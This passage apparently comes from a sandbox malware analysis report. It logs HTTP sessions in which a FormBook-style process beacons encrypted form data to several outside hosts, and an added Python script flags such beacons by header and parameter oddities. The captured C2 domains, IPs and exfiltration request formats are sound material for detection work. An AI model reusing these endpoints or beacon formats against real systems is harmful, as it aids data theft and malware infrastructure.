                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.dietcoffee.online
                                                                                  Referer: http://www.dietcoffee.online/ugyg/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 66 36 68 51 56 54 41 67 77 54 55 4e 42 30 58 65 4a 35 51 45 63 58 39 51 4b 2b 2b 4d 71 57 55 33 44 4b 6d 69 77 4f 35 69 63 7a 72 51 72 52 32 47 70 41 74 2f 33 2f 72 43 77 64 59 57 41 6c 4b 6b 70 52 36 30 39 57 62 78 5a 5a 6a 53 71 5a 51 76 4a 54 6b 66 49 79 74 54 43 74 6b 70 70 79 5a 62 44 6a 76 71 32 73 52 59 73 7a 73 33 30 39 6b 52 62 36 30 67 4c 6d 77 37 34 72 45 51 61 37 7a 4e 48 32 63 71 31 32 35 4e 43 55 73 53 4a 63 62 71 56 77 61 42 56 70 78 35 6e 55 45 5a 6b 62 46 56 69 7a 52 43 49 57 35 4c 62 4d 56 74 6a 55 36 2b 78 57 79 69 6b 4d 57 45 71 52 45 48 67 49 34 6b 79 77 6b 45 35 56 55 69 63 38 6f 43 6b 37 42 61 57 6b 6e 56 38 59 75 41 33 51 46 63 45 37 4b 65 42 4a 51 78 72 41 4a 54 4f 72 63 76 57 6a 71 2f 35 38 67 4e 53 49 33 47 64 65 35 37 47 46 73 37 2b 71 77 6a 64 6a 6e 52 43 70 55 52 75 6a 45 68 39 68 66 6d 2f 55 72 4d 37 71 79 74 59 64 4f 61 38 31 78 69 4c 63 76 74 33 35 52 67 6c 47 4a 6b 6b 6d 78 54 6d 58 43 41 50 49 65 66 38 75 [TRUNCATED]
                                                                                   Data Ascii: PHM8hj-= [TRUNCATED]
                                                                                   Timestamp: Dec 9, 2024 06:58:54.138067961 CET | Bytes transferred: 391 | Direction: IN | Data:
                                                                                   HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:54 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                   Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0 (not printable: chunked gzip body, byte-identical to the one returned in session 21; 179-byte chunk, 203 bytes uncompressed)


                                                                                   Session ID: 24 | Source: 192.168.2.7:50001 | Destination: 77.68.64.45:80 | PID: 5412 | Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                   Timestamp: Dec 9, 2024 06:58:55.505780935 CET | Bytes transferred: 564 | Direction: OUT | Data:
                                                                                   GET /ugyg/?tHfx=9byl&PHM8hj-=oCZiSXk+P+GRfK1CTz9r2QoANXD5JZtnUXBBKsmFkR5XdaXHzOV8eQzOlgaiqn8Qx6Xg8OpRPwSVnkrV8FGOE/7M7rIWJSwROyp8WcVtqR88cxmX/+Bsohxbo7MCCLhiJklW/Y5ke4/8 HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                   Timestamp: Dec 9, 2024 06:58:56.729379892 CET | Bytes transferred: 373 | Direction: IN | Data:
                                                                                   HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:56 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 67 79 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>


                                                                                   Session ID: 25 | Source: 192.168.2.7:50002 | Destination: 146.88.233.115:80 | PID: 5412 | Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                   Timestamp: Dec 9, 2024 06:59:03.191852093 CET | Bytes transferred: 841 | Direction: OUT | Data:
                                                                                   POST /m1g9/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Referer: http://www.smartcongress.net/m1g9/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 50 73 57 46 5a 6e 73 52 39 31 6e 75 65 67 7a 69 2f 6e 43 72 4d 67 62 49 62 4e 54 42 36 2b 4b 43 71 70 5a 70 48 41 30 62 44 2f 50 54 6e 54 6e 52 72 46 5a 42 77 54 74 73 64 4a 4f 65 51 53 56 7a 39 59 4a 58 68 41 73 4a 56 56 66 4a 75 43 52 4a 41 72 39 67 50 70 33 4c 49 59 37 6c 78 59 77 37 72 46 53 57 4b 55 61 57 47 72 67 6f 73 51 62 4e 69 4c 43 74 4b 57 67 6f 72 6c 6e 4a 56 48 4f 35 39 42 55 78 56 4d 7a 4e 32 73 35 72 68 4e 44 77 31 75 66 46 64 33 76 4c 61 6b 63 7a 57 37 71 43 4c 48 32 6c 56 58 56 78 66 54 54 32 64 39 49 6b 4a 35 5a 46 5a 36 70 63 75 62 33 45 57 48 51 6a 35 6a 6b 52 72 52 4b 2f 43 59 49 33 54 6b 53 76 4d 67 3d 3d
                                                                                  Data Ascii: PHM8hj-=PsWFZnsR91nuegzi/nCrMgbIbNTB6+KCqpZpHA0bD/PTnTnRrFZBwTtsdJOeQSVz9YJXhAsJVVfJuCRJAr9gPp3LIY7lxYw7rFSWKUaWGrgosQbNiLCtKWgorlnJVHO59BUxVMzN2s5rhNDw1ufFd3vLakczW7qCLH2lVXVxfTT2d9IkJ5ZFZ6pcub3EWHQj5jkRrRK/CYI3TkSvMg==
                                                                                   Timestamp: Dec 9, 2024 06:59:04.694103003 CET | Bytes transferred: 380 | Direction: IN | Data:
                                                                                   HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:04 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
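Sessions 19 to 25 above are one beacon aimed at three unrelated hosts in turn (www.bankseedz.info, www.dietcoffee.online, www.smartcongress.net), every one answered with a 404. Added example, not part of the Joe Sandbox report: a Python triage script that parses requests of this shape and reports what separates them from real browser traffic. The sample requests are reconstructed from the sessions above with the encrypted bodies shortened; the heuristics (a four-character directory as the path, one form-field name reused across hosts, Origin/Referer that only echo Host, an Android WebView User-Agent sent by a Windows process, Connection: close on every request) are the editor's reading of this capture, not a vendor signature, and the client_os parameter is an assumption supplied by the caller.

```python
"""Flag FormBook-style C2 beacons in captured HTTP requests.

Added example, not part of the Joe Sandbox report. The heuristics come from
the sessions captured in the report; CAPTURED is reconstructed from them
with the encrypted form values cut short.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

C2_PATH = re.compile(r"^/[a-z0-9]{4}/$")   # /an5q/, /ugyg/, /m1g9/ in the capture
ANDROID_UA = ("Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36")


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into method, path, headers and parameters."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qsl turns '+' into ' ' inside the base64-like values; only the keys matter here
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update(parse_qsl(body, keep_blank_values=True))
    return {"method": method, "path": url.path, "headers": headers, "params": params}


def beacon_indicators(req: dict, client_os: str = "Windows") -> list[str]:
    """Per-request oddities that mark this as a beacon rather than a browser navigation.

    client_os is an assumption passed in by the caller (the report shows a Windows
    process as the sender); it is not something the request itself carries.
    """
    h = req["headers"]
    host = h.get("host", "")
    hits = []
    if C2_PATH.match(req["path"]):
        hits.append("four-character directory path")
    if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
        hits.append("Origin/Referer merely echo Host (no page navigation led here)")
    if "Android" in h.get("user-agent", "") and client_os == "Windows":
        hits.append("Android WebView User-Agent from a Windows process")
    if h.get("connection", "").lower() == "close":
        hits.append("Connection: close on every request")
    return hits


def shared_param_keys(reqs: list[dict], min_hosts: int = 2) -> dict[str, list[str]]:
    """Parameter names that recur across different hosts: unrelated web sites do not
    share a form-field name, so this ties the hosts to one malware configuration."""
    hosts_by_key = defaultdict(set)
    for req in reqs:
        for key in req["params"]:
            hosts_by_key[key].add(req["headers"].get("host", ""))
    return {k: sorted(v) for k, v in hosts_by_key.items() if len(v) >= min_hosts}


def _post(host: str, path: str, body: str) -> str:
    return "\r\n".join([f"POST {path} HTTP/1.1", f"Host: {host}", f"Origin: http://{host}",
                        f"Referer: http://{host}{path}", "Connection: close",
                        "Content-Type: application/x-www-form-urlencoded",
                        f"User-Agent: {ANDROID_UA}"]) + "\r\n\r\n" + body


def _get(host: str, path: str, query: str) -> str:
    return "\r\n".join([f"GET {path}?{query} HTTP/1.1", f"Host: {host}", "Connection: close",
                        f"User-Agent: {ANDROID_UA}"]) + "\r\n\r\n"


# Reconstructed from sessions 19-25 of the report (values shortened); the form key
# "PHM8hj-" and the constant "tHfx=9byl" appear exactly like this in the capture.
CAPTURED = [
    _post("www.bankseedz.info", "/an5q/", "PHM8hj-=svVEsgeCaylutKN3xuclQ7If53YfHRPIMAjtv94lYjNIBzMnJwrD"),
    _get("www.bankseedz.info", "/an5q/", "PHM8hj-=ht9kvQ/be1JP/b8F6dsuUaMB3kIjPw&tHfx=9byl"),
    _post("www.dietcoffee.online", "/ugyg/", "PHM8hj-=lAxCRhwFTpS/OqRQQyAg1zUOPUXeDZRDcXxQK8Scpjs3D9Ci"),
    _get("www.dietcoffee.online", "/ugyg/", "tHfx=9byl&PHM8hj-=oCZiSXk+P+GRfK1CTz9r2QoANXD5JZtnUXBBKsmFkR5"),
    _post("www.smartcongress.net", "/m1g9/", "PHM8hj-=PsWFZnsR91nuegzi/nCrMgbIbNTB6+KCqpZpHA0bD/PTnTnRrFZB"),
]


def triage(raw_requests: list[str]) -> dict:
    """Indicator count per request plus the parameter keys shared across hosts."""
    reqs = [parse_request(r) for r in raw_requests]
    per_request = [(r["headers"].get("host"), r["method"], len(beacon_indicators(r))) for r in reqs]
    return {"requests": per_request, "shared_keys": shared_param_keys(reqs)}


if __name__ == "__main__":
    result = triage(CAPTURED)
    for host, method, score in result["requests"]:
        print(f"{method:4} {host:24} indicators={score}")
    print(result["shared_keys"])
```

The per-request indicators are weak on their own (a mobile User-Agent or Connection: close each have benign explanations); the cross-host reuse of the form key "PHM8hj-", and of the constant tHfx=9byl on both GETs, is the link that groups the three domains into one campaign. The 404s tell you nothing about which of the hosts, if any, is the live controller.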


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  26 | 192.168.2.7 | 50003 | 146.88.233.115 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:05.851443052 CET | 861 | OUT | POST /m1g9/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Referer: http://www.smartcongress.net/m1g9/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Ascii: PHM8hj-=PsWFZnsR91nuPwjiswWrLAbLeNTBxeLLqpVpHBwLDJnTgzXRqGBBzTtsWpObPCV49YVlhEsJVR/JuDhJAa9vO53JD47nsow7rFSWKXm8GqIovgrNjv2iUGgrolnJfnPw9BUTVIzj2uBrhPrw09HGT3vJH0dkXYeNJ1a1TxB0YDPpcLJGTbVpHrRnqZTyBhNW7igJmz+edvtde2zraRG6cUr2ncfuNc+lAVb7oM8=
                                                                                  Dec 9, 2024 06:59:07.109618902 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:06 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  27 | 192.168.2.7 | 50004 | 146.88.233.115 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:08.525784969 CET | 1874 | OUT | POST /m1g9/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Referer: http://www.smartcongress.net/m1g9/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:09.802032948 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:09 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  28 | 192.168.2.7 | 50005 | 146.88.233.115 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:11.193873882 CET | 564 | OUT | GET /m1g9/?PHM8hj-=Cu+laRdL4iPyeXPNzSyuHz7Zauix7uTgmbFpChU/EeiHg3j+sEFT8Tsla6iUPxcW2Lx9lDY/eAXQyxZGKIZ6WavBUK62sZwr5lKAXnKNE4AVmzabioebOGd6nWTxCWiwwjsJNJ3z4u1Z&tHfx=9byl HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:12.456168890 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:12 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  29 | 192.168.2.7 | 50006 | 217.160.0.200 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:18.333750963 CET | 832 | OUT | POST /8mom/ HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.carsten.studio
                                                                                  Referer: http://www.carsten.studio/8mom/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Ascii: PHM8hj-=i1/Jbp3LmLCJ87GD1LCCoRF2XCe7IvwIXZ/Oy04bjlOahqizcBWGuzyuGbEo3kepdXVUJ2ttaVj7NGjwPL7T6Cud3z5qRtAnGyTfwL7HusAGJGFkmYZ4V9bzNLCS5GjZCYl9Ubk24GVpcRB4RwVpD0+/Q/YNRmaRJviXHJ0RKhFSOBlcIiVfrD9m3rZhY6A7VXSZFjiZzqrhzokpfQ==
                                                                                  Dec 9, 2024 06:59:19.595206976 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:19 GMT
                                                                                  Server: Apache
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: [chunked, gzip-compressed HTML body; first chunk size 0x7a3; hex dump omitted]
                                                                                  Dec 9, 2024 06:59:19.595297098 CET | 899 | IN | Data Raw: [continuation of the gzip-compressed body; hex dump omitted]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  30 | 192.168.2.7 | 50007 | 217.160.0.200 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:20.989564896 CET | 852 | OUT | POST /8mom/ HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.carsten.studio
                                                                                  Referer: http://www.carsten.studio/8mom/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Ascii: PHM8hj-=i1/Jbp3LmLCJ6q2Dm4aC5BF1Tye7f/wEXZzOy2VGgW6amLSzdD+GtzyuJ7Ex5Ee2dXZyJ2htaV37NE7wM4jQ7Sufij5ofNAnGyTfwL/pusYGI31kk8t3JNb8FrCS9GjdCYlfUaJd4AZpcVR4QitqK0+1dfZYRUL4LeesLpEiFSZvCXk+SAZz1SFdzp9XPcdOXWWBIBW4sdOL+6FtJsSF2KVkWr2fSQJ65MTsnJs=
                                                                                  Dec 9, 2024 06:59:22.289683104 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:22 GMT
                                                                                  Server: Apache
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: [chunked, gzip-compressed HTML body; first chunk size 0x7a3; hex dump omitted]
                                                                                  Dec 9, 2024 06:59:22.289881945 CET | 899 | IN | Data Raw: [continuation of the gzip-compressed body; hex dump omitted]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  31 | 192.168.2.7 | 50008 | 217.160.0.200 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:23.649885893 CET | 1865 | OUT | POST /8mom/ HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.carsten.studio
                                                                                  Referer: http://www.carsten.studio/8mom/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:25.010133028 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:24 GMT
                                                                                  Server: Apache
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: [chunked, gzip-compressed HTML body; first chunk size 0x7a3; hex dump omitted]
                                                                                  Dec 9, 2024 06:59:25.010334015 CET | 899 | IN | Data Raw: [continuation of the gzip-compressed body; hex dump omitted]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  32 | 192.168.2.7 | 50009 | 217.160.0.200 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:26.322825909 CET | 561 | OUT | GET /8mom/?tHfx=9byl&PHM8hj-=v3XpYZPN786X74uq5rH/tUlQYCSKKJswOZfu2m4ZpmP7p96MXgDDjg6tIOsL1UDqFEVhH3VxTleyM0zNBIvLkhe6iRJHcqM7Dhz4vbv1gsAxBWEBkrF+OsuoFL7bmmLpMN9zG59B7XRp HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:27.583722115 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 4545
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:27 GMT
                                                                                  Server: Apache
